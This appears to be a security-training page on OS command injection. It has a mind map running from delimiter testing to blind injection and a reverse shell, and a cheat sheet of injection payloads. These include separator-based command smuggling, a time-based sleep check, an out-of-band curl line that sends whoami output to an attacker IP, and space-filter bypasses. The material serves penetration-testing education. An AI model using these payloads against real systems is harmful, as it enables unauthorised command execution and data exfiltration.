Dashboard > Mind Maps > Command Injection Flow

Command Injection Flow

Injecting OS commands

Command Injections

Tip: Click on any node to see related information!

MAP Interactive Mind Map

graph TD A[Input Field] --> B[Test Delimiters] B --> C[; | && ||] C --> D{Output Visible?} D -->|Yes| E[Direct Injection] D -->|No| F[Blind Injection] E --> G[ls / whoami] F --> H[Time Based (sleep)] F --> I[Out of Band (curl)] G --> J[Reverse Shell] H --> J

MODULES Related Modules

Command Injections

OS command injection techniques....

Web

REF Quick Reference

Basic

; id # Semicolon separator
| id # Pipe separator
|| id # OR separator (runs if first fails)
& id # Background separator
&& id # AND separator (runs if first succeeds)
$(id) # Command substitution
`id` # Backtick substitution

Blind

; sleep 5 # Time-based blind check
| curl http://10.10.14.5/$(whoami) # Out-of-band data exfiltration

Filter Bypass

${IFS} # Use IFS environment variable for space
$'\x20' # Use hex code for space

Back to Mind Maps View Full Module

Save Your Progress

Command Injection Flow

MAP Interactive Mind Map

INFO Node Details

MODULES Related Modules

Command Injections

REF Quick Reference

Basic

Blind

Filter Bypass